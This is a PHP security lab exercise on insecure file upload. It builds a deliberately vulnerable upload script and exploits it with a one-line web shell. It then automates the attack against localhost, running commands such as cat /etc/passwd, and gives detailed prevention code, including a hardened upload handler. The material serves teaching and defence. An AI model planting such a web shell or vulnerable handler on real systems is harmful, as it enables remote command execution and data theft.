
Exercise 49: Insecure File Upload (Remote Code Execution)

Jun 6, 2025

Objective

Learn how to exploit Insecure File Upload vulnerabilities by uploading malicious files (e.g., PHP web shells) to execute arbitrary commands on the server. Understand how to prevent this vulnerability using secure file upload practices.


Scenario

You are testing a web application with a file upload feature that does not properly validate uploaded files. An attacker can upload a malicious file, such as a PHP web shell, and execute arbitrary commands on the server.


Lab Setup

Prerequisites:

  • Basic knowledge of PHP and server security.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • Tools like Burp Suite or browser developer tools for testing.

Step 1: Create the Vulnerable Web Application

  1. PHP Script for Insecure File Upload
    • Create a file upload.php (deliberately vulnerable: the client-supplied filename is used as-is and nothing about the file's type or content is checked):

      <?php
      if (isset($_POST['upload'])) {
          $target_dir  = "uploads/";
          // Client-controlled filename under the web root: no extension or content check.
          $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
          if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
              echo "The file " . basename($_FILES["fileToUpload"]["name"]) . " has been uploaded.";
          } else {
              echo "Sorry, there was an error uploading your file.";
          }
      }
      ?>
      <h2>Upload a File</h2>
      <form method="POST" enctype="multipart/form-data">
        Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload">
        <button type="submit" name="upload">Upload File</button>
      </form>
  2. Create the Uploads Directory
    • Create a directory named uploads in the web server’s root (htdocs for XAMPP).
    • Ensure it is writable by the user the web server runs as (for example daemon, www-data or apache).
  3. Running the Application
    • Start the Apache server.
    • Place upload.php in the web server’s root directory (htdocs for XAMPP).
    • Open http://localhost/upload.php in your browser.

Exploitation Steps

Step 1: Uploading a Malicious PHP Web Shell

  1. Create a simple PHP web shell shell.php that runs whatever is passed in the cmd query parameter and returns its output:

      <?php system($_GET['cmd']); ?>
  2. Upload shell.php using the upload form.
  3. Access the shell in the browser: http://localhost/uploads/shell.php?cmd=ls

Expected Result:

  • The server executes the ls command, listing the directory contents.

Step 2: Remote Command Execution

  1. Execute other commands (the browser percent-encodes the space in the command): http://localhost/uploads/shell.php?cmd=cat%20/etc/passwd

Expected Result:

  • The server displays the contents of /etc/passwd.
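The three exploitation steps above, automated as an added example in PHP (run from the command line with the curl extension); this is not code from the original lab. It assumes the lab is reachable at http://localhost and that the uploads directory is served at /uploads/ as set up earlier; the field names fileToUpload and upload are the ones the lab's upload.php expects.

```php
<?php
// Added example: automates the lab's exploitation steps against the vulnerable
// upload.php on this page. Assumption: the lab runs at http://localhost (XAMPP default).
declare(strict_types=1);

const BASE_URL   = 'http://localhost';   // assumption: lab base URL
const SHELL_NAME = 'shell.php';

// Step 1: write the same one-line web shell the lab uses.
file_put_contents(SHELL_NAME, "<?php system(\$_GET['cmd']); ?>");

// Step 2: POST it as multipart/form-data with the field names upload.php reads.
$ch = curl_init(BASE_URL . '/upload.php');
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POSTFIELDS     => [
        // The filename we send becomes the name on disk, so shell.php lands in uploads/.
        'fileToUpload' => new CURLFile(SHELL_NAME, 'application/x-php', SHELL_NAME),
        'upload'       => 'Upload File',   // makes isset($_POST['upload']) true
    ],
]);
$body = curl_exec($ch);
if ($body === false) {
    fwrite(STDERR, 'upload failed: ' . curl_error($ch) . "\n");
    exit(1);
}
curl_close($ch);
echo 'upload response: ', trim(strip_tags($body)), "\n";

// Step 3: request the shell with a command; the server runs it and returns stdout.
foreach (['id', 'ls -la', 'cat /etc/passwd'] as $cmd) {
    $url = BASE_URL . '/uploads/' . SHELL_NAME . '?cmd=' . rawurlencode($cmd);
    echo "\n$ $cmd\n", file_get_contents($url);
}
```

The uploaded file's Content-Type (application/x-php here) is irrelevant to the vulnerable handler, which never looks at it; only the filename and the web server's handler mapping for .php decide whether the file is executed.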

Solution and Prevention

Problem Analysis

  • The application stores uploads under the web root using the client-chosen filename and without validating type, extension or content. Because the web server maps .php files in that directory to the PHP interpreter, any uploaded PHP file can then be executed by requesting its URL.

Fixing the Vulnerability

  1. Restrict Allowed File Types
    • Allow only safe file types (e.g., images), checking the detected content type of the temporary file rather than the client-supplied name or Content-Type header (mime_content_type requires the fileinfo extension):

      $allowed_types = ['image/jpeg', 'image/png', 'image/gif'];
      $file_type = mime_content_type($_FILES['fileToUpload']['tmp_name']);
      if (!in_array($file_type, $allowed_types, true)) {
          die("Invalid file type.");
      }

    • This check alone is not sufficient: a file that begins with valid image magic bytes (e.g., GIF89a) followed by PHP code passes it, so it must be combined with the renaming and non-executable storage below.
  2. Rename Uploaded Files
    • Generate an unpredictable, server-chosen filename and derive the extension from the validated type instead of the original name (uniqid() is time-based and guessable; random_bytes() is not):

      $ext_for  = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
      $new_name = bin2hex(random_bytes(16)) . "." . $ext_for[$file_type];
      move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], "uploads/" . $new_name);
  3. Store Files Outside Web Root
    • Move uploaded files to a directory the web server does not serve, so nothing in it can be requested (let alone executed) by URL; return files through a handler script with readfile() and a fixed Content-Type:

      $target_dir = "/var/www/uploads/";

    • Check the path against the server's DocumentRoot first. On Debian/Ubuntu Apache the root is /var/www/html, so /var/www/uploads/ is outside it; on XAMPP the root is htdocs, and the directory must be placed elsewhere.
  4. Disable Script Execution in Uploads Directory
    • If files must stay under the web root, add an .htaccess in uploads/ (AllowOverride must permit it) that refuses requests for script extensions and turns the PHP engine off for the directory. Deny from all is Apache 2.2 syntax; on Apache 2.4 use Require all denied. php_flag only applies with mod_php; with PHP-FPM, remove the PHP handler mapping for the directory in the server configuration instead:

      <FilesMatch "\.(php[0-9]*|phtml|phar)$">
          Require all denied
      </FilesMatch>
      php_flag engine off
  5. Use Content Security Policy (CSP) When Serving Uploads
    • A Content-Security-Policy header is a browser-side control and does nothing against server-side execution of an uploaded .php file. It matters for uploads the browser renders (HTML, SVG), which can otherwise carry JavaScript and become stored XSS. Send it from the handler that serves stored files, together with a fixed Content-Type, X-Content-Type-Options: nosniff and Content-Disposition: attachment:

      header("Content-Security-Policy: default-src 'self'; script-src 'none'");
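The five fixes above combined into one hardened replacement for upload.php, as an added example in PHP; this is not the page's own code. It assumes PHP 7.4+ with the fileinfo extension, a storage directory /var/lib/lab-uploads that is outside DocumentRoot and writable by the web server user, and a query parameter f on the same script for downloads; those names are choices made for the example. Note that the content checks still pass a GIF89a/PHP polyglot, which is why the file is renamed with a server-chosen name, stored where no URL maps to it, made non-executable, and served as an attachment with sniffing disabled.

```php
<?php
// upload_secure.php -- added example, not the lab's code. Hardened upload + download handler.
// Assumptions: PHP 7.4+, fileinfo extension, STORAGE_DIR outside the web root and writable.
declare(strict_types=1);

const STORAGE_DIR = '/var/lib/lab-uploads';          // assumption: NOT under DocumentRoot
const MAX_BYTES   = 2 * 1024 * 1024;                 // 2 MiB cap
// Allowlist: detected MIME type => extension we assign. The client's filename and
// Content-Type are never consulted.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Validates one $_FILES entry and returns the extension to assign, or throws.
function validate_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload error code ' . (int) $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {       // must originate from this request
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Detect the type from content (magic bytes), not from the supplied name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED)) {
        throw new RuntimeException('Type not allowed: ' . $mime);
    }
    // Independent second check: the bytes must decode as an image of the same type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('Content does not decode as the detected image type');
    }
    return ALLOWED[$mime];
}

// Stores a validated upload under a random name and returns that name.
function store_upload(array $file): string
{
    $ext  = validate_upload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // server-chosen, unpredictable name
    if (!is_dir(STORAGE_DIR) && !mkdir(STORAGE_DIR, 0750, true)) {
        throw new RuntimeException('Storage directory unavailable');
    }
    $dest = STORAGE_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);                                // never executable on disk
    return $name;
}

// Serves a stored file; only names this script generated are accepted.
function serve_stored_file(string $name): void
{
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif)$/', $name)) {
        http_response_code(404);
        exit;
    }
    $path = STORAGE_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        exit;
    }
    $mime = array_search(pathinfo($name, PATHINFO_EXTENSION), ALLOWED, true);
    header('Content-Type: ' . $mime);                  // fixed type from our allowlist
    header('X-Content-Type-Options: nosniff');         // browser must not re-guess it
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header("Content-Security-Policy: default-src 'none'; sandbox");
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}

if (isset($_GET['f'])) {
    serve_stored_file((string) $_GET['f']);
}
if (isset($_POST['upload'], $_FILES['fileToUpload'])) {
    try {
        $stored = store_upload($_FILES['fileToUpload']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
?>
<h2>Upload a File</h2>
<form method="POST" enctype="multipart/form-data">
  Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload">
  <button type="submit" name="upload">Upload File</button>
</form>
```

With this handler, shell.php is rejected with "Type not allowed: text/x-php" (or similar, depending on libmagic's verdict), and a polyglot image that passes both content checks ends up as a random .jpg/.png/.gif under /var/lib/lab-uploads, reachable only through ?f=<name>, where it is returned as an attachment rather than executed.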

Testing After Fix

  1. Attempt to upload shell.php.
  2. Expected Result:
    • The server rejects the file ("Invalid file type"). If a polyglot image carrying PHP code passes the type check, it is stored under a random image name in a directory that is not served or not executable.
  3. Attempt to access the uploaded file as http://localhost/uploads/shell.php?cmd=ls.
  4. Expected Result:
    • The server returns 403/404 or a not-found error; no command output appears.

Conclusion

In this lab, you exploited an Insecure File Upload vulnerability to upload a malicious PHP web shell and execute commands on the server. You also learned how to prevent this vulnerability through file type validation, secure storage practices, and disabling script execution in upload directories.
